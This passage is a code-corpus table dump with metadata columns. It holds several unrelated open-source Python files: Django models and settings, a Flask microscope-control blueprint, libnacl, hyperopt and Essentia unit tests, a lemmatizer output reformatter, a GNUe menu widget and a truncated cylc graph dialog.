repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
unho/thesaurus_editor | thesaurus/models.py | 1 | 3604 | # -*- coding: UTF-8 -*-
#
# Copyright 2013 Leandro Regueiro
#
# This file is part of Thesaurus-editor.
#
# Thesaurus-editor is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# Thesaurus-editor is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Thesaurus-editor. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
#class Language(models.Model):
# iso_code = models.CharField(primary_key=True, max_length=10)
# name = models.CharField(max_length=50)
#
# def __unicode__(self):
# return u"%(iso_code)s" % self.iso_code
#class Thesaurus(models.Model):
# name = models.CharField(primary_key=True, max_length=50)
# language = models.ForeignKey(Language, null=True, on_delete=models.SET_NULL)
#
# def __unicode__(self):
# return self.name
class Word(models.Model):
word = models.CharField(primary_key=True, max_length=100)
finalized = models.BooleanField(default=False)
#thesaurus = models.ForeignKey(Thesaurus)
class Meta:
ordering = ['word']
#unique_together = ("word", "thesaurus")#TODO in case of uncommenting this, remove primary_key=True from word field.
def __unicode__(self):
return self.word
def _retrieve_list(self, relationship_type):
relationship_list = []
for relationship in self.relationship_set.filter(relationship_type=relationship_type):
#TODO export the relationship objects too, since it is neccessary for getting the part of speech.
#TODO export the relationship intermediary table, since it is neccessary for getting the notes.
relationship_list.append({"pk": relationship.pk,
"pos": relationship.pos,
"words": relationship.words.exclude(word=self)})
return relationship_list
def retrieve_synonyms(self):
return self._retrieve_list("S")
def retrieve_antonyms(self):
return self._retrieve_list("A")
def retrieve_hypernyms(self):
return self._retrieve_list("H")
#def next_word(self):
# return
class Relationship(models.Model):
    """A typed relationship (synonym/antonym/hypernym) between a set of words.

    Words participate through the WordsForRelationship intermediary table.
    """
    # Single-letter codes stored in relationship_type.
    RELATIONSHIP_CHOICES = (
        (u'S', u'Synonym'),
        (u'A', u'Antonym'),
        (u'H', u'Hypernym'),
    )
    relationship_type = models.CharField(max_length=2, choices=RELATIONSHIP_CHOICES)
    words = models.ManyToManyField(Word, through='WordsForRelationship')
    pos = models.CharField(max_length=20, null=True, blank=True, default="")# Part of speech
    def __unicode__(self):
        # e.g. u"Synonym: [<Word: ...>, ...]" -- words.all() is a queryset repr.
        return u"%(type)s: %(words)s" % {"type": self.get_relationship_type_display(), "words": self.words.all()}
class WordsForRelationship(models.Model):
    """Intermediary (through) table linking a Word into a Relationship.

    A word can appear at most once per relationship (see unique_together).
    """
    relationship = models.ForeignKey(Relationship)
    word = models.ForeignKey(Word)
    note = models.CharField(max_length=20, null=True, blank=True, default="")# Like (generic word) or something like that
    class Meta:
        unique_together = ("relationship", "word")
    def __unicode__(self):
        return u"%(word)s --> %(relationship)s" % {"word": self.word, "relationship": self.relationship}
| gpl-3.0 | -741,755,615,329,156,500 | 35.40404 | 124 | 0.6601 | false | 3.754167 | false | false | false |
devalbo/mm_anywhere | mm_app_core.py | 1 | 4332 | """
mm_app_core.py
~~~~~~~~~~~~
This module supports accessing image acquisition functionality, similar to the
main Micro-Manager dialog.
:copyright: (c) 2012 by Albert Boehmler
:license: GNU Affero General Public License, see LICENSE for more details.
"""
import sys, os, time, thread
from flask import Blueprint, render_template, abort, url_for, redirect, request
from pylab import imsave, cm
import MMCorePy
from settings import mm_core as mmc
import settings
import configurations
import mm_util
mm_app_core = Blueprint('mm_app_core', __name__,
template_folder='templates')
@mm_app_core.route('/')
def index():
    """Render the main acquisition page.

    Passes this module itself to the template (so it can call the get_*
    helpers) plus the list of available configurations.
    """
    return render_template('acquisition.html',
                           mm_app_core=sys.modules[__name__],
                           configurations=configurations._get_configs_listing())
def get_allowed_binning_values():
    """Return the binning values the current camera device accepts."""
    return mmc.getAllowedPropertyValues(mmc.getCameraDevice(),
                                        MMCorePy.g_Keyword_Binning)

def get_available_shutters():
    """Return the names of all loaded shutter devices."""
    return mmc.getLoadedDevicesOfType(MMCorePy.ShutterDevice)

@mm_app_core.route('/binning/')
def get_binning():
    """Return the camera's current binning property value."""
    return mmc.getProperty(mmc.getCameraDevice(),
                           MMCorePy.g_Keyword_Binning)

@mm_app_core.route('/binning/', methods=['POST'])
def set_binning():
    """Set camera binning from the posted 'binning' form field."""
    binning_value = int(request.form['binning'])
    return _set_binning(binning_value)

@mm_app_core.route('/shutter/')
def get_shutter():
    """Return the name of the currently selected shutter device."""
    return mmc.getShutterDevice()

@mm_app_core.route('/exposure/')
def get_exposure():
    # NOTE(review): mmc.getExposure() returns a float, not a string; other
    # getters return str-like values. Flask view functions normally require
    # a string/response -- confirm whether this should be str(...)-wrapped.
    return mmc.getExposure()

@mm_app_core.route('/exposure/', methods=['POST'])
def set_exposure():
    """Set exposure (ms) from the posted 'exposure' form field."""
    exposure_value = float(request.form['exposure'])
    return _set_exposure(exposure_value)

@mm_app_core.route('/auto-shutter/')
def get_auto_shutter():
    # NOTE(review): returns a bool, not a string -- see note on get_exposure.
    return mmc.getAutoShutter()

@mm_app_core.route('/auto-shutter/', methods=['POST'])
def set_auto_shutter():
    """Enable/disable auto-shutter from the posted JS boolean."""
    auto_shutter_value = mm_util.from_js_boolean(request.form['auto-shutter'])
    return _set_auto_shutter(auto_shutter_value)

@mm_app_core.route('/open-shutter/')
def get_shutter_open():
    # NOTE(review): returns a bool, not a string -- see note on get_exposure.
    return mmc.getShutterOpen()

@mm_app_core.route('/open-shutter/', methods=['POST'])
def set_shutter_open():
    """Open/close the shutter from the posted JS boolean."""
    open_shutter_value = mm_util.from_js_boolean(request.form['open-shutter'])
    return _set_shutter_open(open_shutter_value)

@mm_app_core.route('/active-shutter/')
def get_active_shutter():
    # NOTE(review): uses mmc.getShutter() while get_shutter() above uses
    # mmc.getShutterDevice() -- confirm the intended MMCore call.
    return mmc.getShutter()

@mm_app_core.route('/active-shutter/', methods=['POST'])
def set_active_shutter():
    """Select the active shutter device from the posted form field."""
    active_shutter_value = str(request.form['active-shutter'])
    return _set_active_shutter(active_shutter_value)

@mm_app_core.route('/snap-image/')
def snap_image():
    """Acquire one image and render a page linking to the saved file."""
    image_name = _snap_image()
    return render_template('snap-image.html',
                           img_url=url_for('acq.download_acquired_image',
                                           image_name=image_name))
def _is_camera_available():
    """Return True if MMCore currently has a camera device selected."""
    # Fix: use the idiomatic identity test instead of the PEP 8-discouraged
    # `None != x` comparison (E711); behavior is unchanged.
    return mmc.getCameraDevice() is not None
def _set_binning(binning_value):
    """Apply *binning_value* to the camera (if present) and report it back.

    Returns the binning property as read back from the device, so the
    caller sees the value that actually took effect.
    """
    if (_is_camera_available()):
        mmc.setProperty(mmc.getCameraDevice(),
                        MMCorePy.g_Keyword_Binning,
                        binning_value)
    # NOTE(review): when no camera is available this still queries the
    # (absent) camera device -- confirm whether the read-back should also be
    # guarded by _is_camera_available().
    return mmc.getProperty(mmc.getCameraDevice(),
                           MMCorePy.g_Keyword_Binning)
def _set_exposure(exposure_value):
    """Set the exposure time and return the read-back value as a string."""
    mmc.setExposure(exposure_value)
    return str(mmc.getExposure())

def _set_auto_shutter(auto_shutter_value):
    """Enable/disable auto-shutter and return the read-back state as a string."""
    mmc.setAutoShutter(auto_shutter_value)
    return str(mmc.getAutoShutter())

def _set_shutter_open(shutter_open_value):
    """Open/close the shutter and return the read-back state as a string."""
    mmc.setShutterOpen(shutter_open_value);
    return str(mmc.getShutterOpen())
def _set_active_shutter(active_shutter_value):
    """Select *active_shutter_value* as the active shutter device.

    Returns the name of the shutter device that is active after the call,
    matching the set-then-read-back pattern of the other ``_set_*`` helpers.
    """
    # Bug fix: the original `return mmc.setShutterDevice(...)` made the
    # following `return mmc.getShutterDevice()` unreachable, so callers got
    # the (useless) result of the setter instead of the read-back value.
    mmc.setShutterDevice(active_shutter_value)
    return mmc.getShutterDevice()
def _snap_image():
    """Snap one image, save it under a timestamped name, return that name."""
    timestamp_ms = int(time.time() * 1000)
    image_name = "acq-%s.png" % timestamp_ms
    save_location = os.path.join(settings.MM_ANYWHERE_HOST_DATA_PATH,
                                 image_name)
    camera = ""
    # Acquisition used to be dispatched to a background thread; it is now
    # performed synchronously before returning the file name.
    _execute_snap_image(camera, save_location)
    return image_name
def _execute_snap_image(camera, save_location):
    """Trigger MMCore to snap an image and save it as a grayscale PNG.

    The *camera* argument is currently unused by the MMCore calls; the
    acquired frame is written to *save_location* via pylab's imsave.
    """
    mmc.snapImage()
    mmc.waitForSystem()
    img = mmc.getImage()
    imsave(save_location, img, cmap = cm.gray)
| agpl-3.0 | -4,937,903,672,448,641,000 | 29.507042 | 80 | 0.660434 | false | 3.254696 | false | false | false |
saltstack/libnacl | tests/unit/test_raw_random.py | 1 | 3629 | """
Basic tests for randombytes_* functions
"""
import libnacl
import unittest
class TestRandomBytes(unittest.TestCase):
    """Basic sanity checks for libnacl's randombytes_*, kdf and kx wrappers."""

    def test_randombytes_random(self):
        self.assertIsInstance(libnacl.randombytes_random(), int)

    def test_randombytes_uniform(self):
        self.assertIsInstance(libnacl.randombytes_uniform(200), int)
        # With 65536 draws over [0, 256) every value should appear at least once.
        freq = {libnacl.randombytes_uniform(256): 1 for _ in range(65536)}
        self.assertEqual(256, len(freq))
        self.assertTrue(all(freq.values()))

    def test_randombytes(self):
        'copied from libsodium default/randombytes.c'
        # All 256 byte values should appear in 64 KiB of random data.
        data = libnacl.randombytes(65536)
        freq = {x: 1 for x in data}
        self.assertEqual(256, len(freq))
        self.assertTrue(all(freq.values()))

    def test_randombytes_buf_deterministic(self):
        # Same seed -> same output; different seed -> different output.
        seed = libnacl.randombytes_buf(32)
        seed2 = libnacl.randombytes_buf(32)
        data = libnacl.randombytes_buf_deterministic(32, seed)
        data2 = libnacl.randombytes_buf_deterministic(32, seed)
        data3 = libnacl.randombytes_buf_deterministic(32, seed2)
        self.assertEqual(32, len(data))
        self.assertEqual(32, len(data))
        self.assertEqual(32, len(data))
        self.assertEqual(data, data2)
        self.assertNotEqual(data, data3)

    def test_crypto_kdf_keygen(self):
        master_key = libnacl.crypto_kdf_keygen()
        freq = {x: 1 for x in master_key}
        self.assertEqual(32, len(master_key))
        self.assertTrue(all(freq.values()))

    def test_crypto_kdf_derive_from_key(self):
        # Same (id, context, key) -> same subkey; different id -> different subkey.
        master_key = libnacl.crypto_kdf_keygen()
        subkey = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
        subkey2 = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
        subkey3 = libnacl.crypto_kdf_derive_from_key(16, 2, "Examples", master_key)
        self.assertEqual(16, len(subkey))
        self.assertEqual(16, len(subkey2))
        self.assertEqual(16, len(subkey3))
        self.assertEqual(subkey, subkey2)
        self.assertNotEqual(subkey, subkey3)

    def test_crypto_kx_keypair(self):
        pk, sk = libnacl.crypto_kx_keypair()
        self.assertEqual(32, len(pk))
        self.assertEqual(32, len(sk))

    def test_crypto_kx_seed_keypair(self):
        # Seeded keypair generation must be deterministic per seed.
        seed = libnacl.randombytes_buf(32)
        seed2 = libnacl.randombytes_buf(32)
        pk, sk = libnacl.crypto_kx_seed_keypair(seed)
        pk2, sk2 = libnacl.crypto_kx_seed_keypair(seed)
        pk3, sk3 = libnacl.crypto_kx_seed_keypair(seed2)
        self.assertEqual(pk, pk2)
        self.assertNotEqual(pk, pk3)
        self.assertEqual(sk, sk2)
        self.assertNotEqual(sk, sk3)

    def test_crypto_kx_client_session_keys(self):
        client_pk, client_sk = libnacl.crypto_kx_keypair()
        server_pk, server_sk = libnacl.crypto_kx_keypair()
        rx, tx, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
        rx2, tx2, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
        self.assertEqual(32, len(rx))
        self.assertEqual(32, len(tx))
        self.assertEqual(rx, rx2)
        self.assertEqual(tx, tx2)

    def test_crypto_kx_server_session_keys(self):
        client_pk, client_sk = libnacl.crypto_kx_keypair()
        server_pk, server_sk = libnacl.crypto_kx_keypair()
        # NOTE(review): this passes the *client* keypair to the server-side
        # call (same arguments as the client test above); the libsodium kx
        # API takes the server's own keypair plus the client public key --
        # confirm whether (server_pk, server_sk, client_pk) was intended.
        rx, tx, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
        rx2, tx2, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
        self.assertEqual(32, len(rx))
        self.assertEqual(32, len(tx))
        self.assertEqual(rx, rx2)
        self.assertEqual(tx, tx2)
| apache-2.0 | 3,889,134,625,305,365,000 | 33.894231 | 95 | 0.659961 | false | 3.237288 | true | false | false |
pengutronix/aiohttp-json-rpc | examples/django3_example_project/example_project/settings.py | 1 | 3115 | """
Django settings for example_project project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; for any real
# deployment it must be rotated and loaded from the environment instead.
SECRET_KEY = '%sog7c%&7^pk5+v@4@2^+s$5r45wzkxe@^)9ki0ik#k+!sa8_&'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty list is fine while DEBUG is True; production must list real hosts.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'example_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'example_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | 6,363,014,849,474,257,000 | 24.958333 | 91 | 0.686035 | false | 3.5 | false | false | false |
mathkann/hyperopt | hyperopt/tests/test_criteria.py | 7 | 1917 | import numpy as np
import hyperopt.criteria as crit
def test_ei():
    """Check the analytic Gaussian EI against the empirical estimate.

    For two (mean, var) settings, evaluates expected improvement over a grid
    of thresholds and requires the Monte-Carlo estimate (10000 samples) to
    agree with the closed form within 3% absolute/relative tolerance.
    """
    rng = np.random.RandomState(123)
    for mean, var in [(0, 1), (-4, 9)]:
        thresholds = np.arange(-5, 5, .25) * np.sqrt(var) + mean
        v_n = [crit.EI_gaussian_empirical(mean, var, thresh, rng, 10000)
               for thresh in thresholds]
        v_a = [crit.EI_gaussian(mean, var, thresh)
               for thresh in thresholds]
        #import matplotlib.pyplot as plt
        #plt.plot(thresholds, v_n)
        #plt.plot(thresholds, v_a)
        #plt.show()
        if not np.allclose(v_n, v_a, atol=0.03, rtol=0.03):
            # Dump the per-threshold discrepancies before failing.
            for t, n, a in zip(thresholds, v_n, v_a):
                print t, n, a, abs(n - a), abs(n - a) / (abs(n) + abs(a))
            assert 0
            #mean, var, thresh, v_n, v_a)
def test_log_ei():
    """logEI_gaussian should match log(EI_gaussian) where EI is not tiny.

    The log-domain implementation exists to stay finite for large
    thresholds; here we only verify it agrees with the naive log(EI) on a
    threshold range where both are computable.
    """
    for mean, var in [(0, 1), (-4, 9)]:
        thresholds = np.arange(-5, 30, .25) * np.sqrt(var) + mean
        ei = np.asarray(
            [crit.EI_gaussian(mean, var, thresh)
             for thresh in thresholds])
        nlei = np.asarray(
            [crit.logEI_gaussian(mean, var, thresh)
             for thresh in thresholds])
        naive = np.log(ei)
        #import matplotlib.pyplot as plt
        #plt.plot(thresholds, ei, label='ei')
        #plt.plot(thresholds, nlei, label='nlei')
        #plt.plot(thresholds, naive, label='naive')
        #plt.legend()
        #plt.show()
        # -- assert that they match when the threshold isn't too high
        assert np.allclose(nlei, naive)
def test_log_ei_range():
    """logEI_gaussian must stay finite even for extreme thresholds."""
    thresholds = [-500, 0, 50, 100, 500, 5000]
    values = [crit.logEI_gaussian(0, 1, thresh) for thresh in thresholds]
    assert np.all(np.isfinite(values))
def test_ucb():
    """UCB(mean, var, z) == mean + z * sqrt(var) for a few fixed cases."""
    cases = [
        ((0, 1, 1), 1),
        ((0, 1, 2), 2),
        ((0, 4, 1), 2),
        ((1, 4, 1), 3),
    ]
    for (mean, var, zscore), expected in cases:
        assert np.allclose(crit.UCB(mean, var, zscore), expected)
# -- flake8
| bsd-3-clause | -1,589,826,703,282,367,200 | 29.919355 | 73 | 0.542514 | false | 3.112013 | false | false | false |
WING-NUS/TESLA-S | lemma_format.py | 1 | 3183 | #!/usr/bin/env python
import sys
import re
from util import *
##
## reformat lemmatizer output from different lemmatizers
## output format: lemma1 lemma2 ... one sentence per line
##
# Validate the single required argument: which lemmatizer produced stdin.
if len(sys.argv) != 2:
    print "usage: lemma_reformat.py [treetagger|freeling|morce|morph] < input > output"
    sys.exit(-1)
if sys.argv[1] in "treetagger freeling morce morph".split():
    tagger = sys.argv[1]
else:
    print "Error: unknown lemmatizer: ", sys.argv[1]
    sys.exit(-1)
# POS/lemma separator
sep = "_"
if tagger == 'morce':
    # Morce emits SGML-like <f ...> elements, one sentence per <s> block.
    for paragraph in paragraphs(sys.stdin, separator=lambda x:x.strip()=="<s>", includeEmpty=False):
        if paragraph.startswith("<csts>"):
            continue
        for line in paragraph.split("\n"):
            line = line.decode("utf8", "replace")
            # NOTE(review): operator precedence makes the `or
            # line.startswith("<d")` clause dead -- any <d line already
            # fails the `not line.startswith("<f")` test. Was
            # `not (line.startswith("<f") or line.startswith("<d"))` meant?
            if not line.startswith("<f") or line.startswith("<d"):
                continue
            try:
                # Word form is the element's text content: ">word<".
                re_word = re.search(">.*?<", line)
                word = re_word.group(0)[1:-1]
                # POS is the first character after the MDt tag.
                re_pos = re.search("MDt.*?>.", line)
                pos = re_pos.group(0)[-1]
                # Lemma sits between the MDl tag and the next element;
                # strip morce's trailing "-..."/"_..." disambiguation.
                re_lem = re.search("(<MDl.*?>)([^<]*)(<)", line)
                lem = re_lem.group(2)
                if lem.find("-") > 0:
                    lem = lem[:lem.find("-")]
                if lem.find("_") > 0:
                    lem = lem[:lem.find("_")]
            except:
                # NOTE(review): after this warning `lem` may be unbound (or
                # stale from the previous line) when the lowercase/print
                # below runs -- confirm a `continue` was intended here.
                print "Warning: no lemma found: %s" % line.encode("utf8", "replace")
            # lowercase lemma
            lem = lem.lower()
            print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
        print""
elif tagger == 'morph':
    # Morph tokens look like word_POS_lemma (or word_lemma with one "_").
    while True:
        line = sys.stdin.readline()
        if line == '':
            break
        line = line.decode("utf8", "replace")
        tokens = line.split()
        if tokens == []:
            continue
        for token in tokens:
            sep1 = token.find('_')
            sep2 = token.find('_', sep1+1)
            if sep2 < 0:
                # Only one separator: token is word_POS; reuse the word as lemma.
                lem = token[:sep1].lower()
                print "%s%s%s" % (token.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
            else:
                word_pos = token[:sep2]
                lem = token[sep2+1:].lower()
                print "%s%s%s" % (word_pos.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
        print ""
        sys.stdout.flush()
else:
    # treetagger / freeling: whitespace-separated columns, one token per line.
    for paragraph in paragraphs(sys.stdin, includeEmpty=False):
        for line in paragraph.split("\n"):
            line = line.decode("utf8", "replace")
            tokens = line.split()
            if len(tokens) < 3: # skip 'other' stuff like xml markup
                continue
            if tagger == 'treetagger':
                word, pos, lem = tokens
                if lem == "<unknown>":
                    lem = word
            else: # tagger == "freeling"
                word, lem, pos = tokens[:3]
            # lowercase lemma
            lem = lem.lower()
            print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
        print""
| gpl-2.0 | -8,585,263,154,572,538,000 | 34.366667 | 127 | 0.49136 | false | 3.490132 | false | false | false |
arseneyr/essentia | test/src/unittest/standard/test_envelope.py | 1 | 2094 | #!/usr/bin/env python
# Copyright (C) 2006-2016 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
import numpy
class TestEnvelope(TestCase):
    """Tests for the essentia Envelope algorithm."""

    def testFile(self):
        # Every envelope sample of a real decreasing-sine file must be a
        # valid (finite) number.
        filename = join(testdata.audio_dir, 'generated', 'synthesised', 'sin_pattern_decreasing.wav')
        audioLeft = MonoLoader(filename=filename, downmix='left', sampleRate=44100)()
        envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(audioLeft)
        for x in envelope:
            self.assertValidNumber(x)

    def testEmpty(self):
        self.assertEqualVector(Envelope()([]), [])

    def testZero(self):
        # An all-zero signal must produce an all-zero envelope.
        input = [0]*100000
        envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(input)
        self.assertEqualVector(envelope, input)

    def testOne(self):
        # With rectification enabled a single negative sample is mirrored
        # to its absolute value.
        input = [-0.5]
        envelope = Envelope(sampleRate=44100, attackTime=0, releaseTime=100, applyRectification=True)(input)
        self.assertEqual(envelope[0], -input[0])

    def testInvalidParam(self):
        self.assertConfigureFails(Envelope(), { 'sampleRate': 0 })
        self.assertConfigureFails(Envelope(), { 'attackTime': -10 })
        self.assertConfigureFails(Envelope(), { 'releaseTime': -10 })
self.assertConfigureFails(Envelope(), { 'attackTime': -10 })
self.assertConfigureFails(Envelope(), { 'releaseTime': -10 })
suite = allTests(TestEnvelope)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
| agpl-3.0 | -8,136,286,983,662,147,000 | 36.072727 | 108 | 0.684814 | false | 3.766187 | true | false | false |
HarmonyEnterpriseSolutions/harmony-platform | src/gnue/forms/uidrivers/java/widgets/menuitem.py | 1 | 3754 | # GNU Enterprise Forms - wx 2.6 UI Driver - MenuItem widget
#
# Copyright 2001-2007 Free Software Foundation
#
# This file is part of GNU Enterprise
#
# GNU Enterprise is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2, or (at your option) any later version.
#
# GNU Enterprise is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with program; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place
# - Suite 330, Boston, MA 02111-1307, USA.
#
# $Id: menuitem.py,v 1.5 2011/07/01 20:08:23 oleg Exp $
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import MenuItem
# =============================================================================
# Wrap an UI layer around a wxMenu widget
# =============================================================================
class UIMenuItem(UIWidget):
    """
    Implements a menu item object.
    """

    # -------------------------------------------------------------------------
    # Create a menu item widget
    # -------------------------------------------------------------------------

    def _create_widget_(self, event):
        """
        Creates a new MenuItem widget (or a separator when no label is set).
        """
        if not event.container:
            return

        label = self._gfObject.label
        if label is None:
            # No label: this entry is rendered as a plain separator.
            self.widget = None
            event.container.uiAddSeparator()
            return

        icon_file = self._gfObject._get_icon_file(size="16x16", format="png")
        icon_path = self._uiDriver.getStaticResourceWebPath(icon_file) or ''
        # Items with an "off" action behave as checkable menu entries.
        is_checkbox = self._gfObject.action_off is not None

        item = MenuItem(self, label, icon_path, is_checkbox)
        event.container.uiAddMenu(item)
        self.widget = item

    # -------------------------------------------------------------------------
    # Events
    # -------------------------------------------------------------------------

    def onMenu(self, remoteWidget):
        """Remote activation of the item fires the associated GF event."""
        self._gfObject._event_fire()

    # -------------------------------------------------------------------------
    # Check/uncheck menu item
    # -------------------------------------------------------------------------

    def _ui_switch_on_(self):
        self.__set_checked(True)

    def _ui_switch_off_(self):
        self.__set_checked(False)

    def __set_checked(self, state):
        # Separators have no remote widget; only real items can be checked.
        if self.widget is not None:
            self.widget.uiCheck(state)

    # -------------------------------------------------------------------------
    # Enable/disable menu item
    # -------------------------------------------------------------------------

    def _ui_enable_(self, enabled):
        if self.widget is not None:
            self.widget.uiEnable(enabled)

    #def getId(self):
    #    return self.widget.GetId()
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIMenuItem,
'provides' : 'GFMenuItem',
'container': False
}
| gpl-2.0 | -4,051,717,551,590,470,700 | 29.770492 | 79 | 0.514118 | false | 4.280502 | false | false | false |
arjclark/cylc | lib/cylc/gui/graph.py | 2 | 3139 | #!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2018 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
from cylc.gui.gcapture import Gcapture
from cylc.gui.warning_dialog import warning_dialog
def graph_suite_popup(reg, cmd_help, defstartc, defstopc, graph_opts,
                      gcapture_windows, tmpdir, template_opts,
                      parent_window=None):
    """Popup a dialog to allow a user to configure their suite graphing."""
    # Graphing needs xdot; bail out with a warning dialog if it is missing.
    try:
        import xdot
    except ImportError as exc:
        warning_dialog(str(exc) + "\nGraphing disabled.", parent_window).warn()
        return False
    window = gtk.Window()
    window.set_border_width(5)
    window.set_title("cylc graph " + reg)
    window.set_transient_for(parent_window)
    window.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
    vbox = gtk.VBox()
    # Start-point entry, pre-filled with the default start cycle if given.
    label = gtk.Label("[START]: ")
    start_entry = gtk.Entry()
    start_entry.set_max_length(14)
    if defstartc:
        start_entry.set_text(str(defstartc))
    ic_hbox = gtk.HBox()
    ic_hbox.pack_start(label)
    ic_hbox.pack_start(start_entry, True)
    vbox.pack_start(ic_hbox)
    # Stop-point entry, pre-filled with the default stop cycle if given.
    label = gtk.Label("[STOP]:")
    stop_entry = gtk.Entry()
    stop_entry.set_max_length(14)
    if defstopc:
        stop_entry.set_text(str(defstopc))
    fc_hbox = gtk.HBox()
    fc_hbox.pack_start(label)
    fc_hbox.pack_start(stop_entry, True)
    vbox.pack_start(fc_hbox, True)
    cancel_button = gtk.Button("_Close")
    cancel_button.connect("clicked", lambda x: window.destroy())
    # "Graph" launches `cylc graph` with the entered start/stop points.
    ok_button = gtk.Button("_Graph")
    ok_button.connect("clicked", lambda w: graph_suite(
        reg,
        start_entry.get_text(),
        stop_entry.get_text(),
        graph_opts, gcapture_windows,
        tmpdir, template_opts, parent_window))
    help_button = gtk.Button("_Help")
    help_button.connect("clicked", cmd_help, '', 'graph')
    hbox = gtk.HBox()
    hbox.pack_start(ok_button, False)
    hbox.pack_end(cancel_button, False)
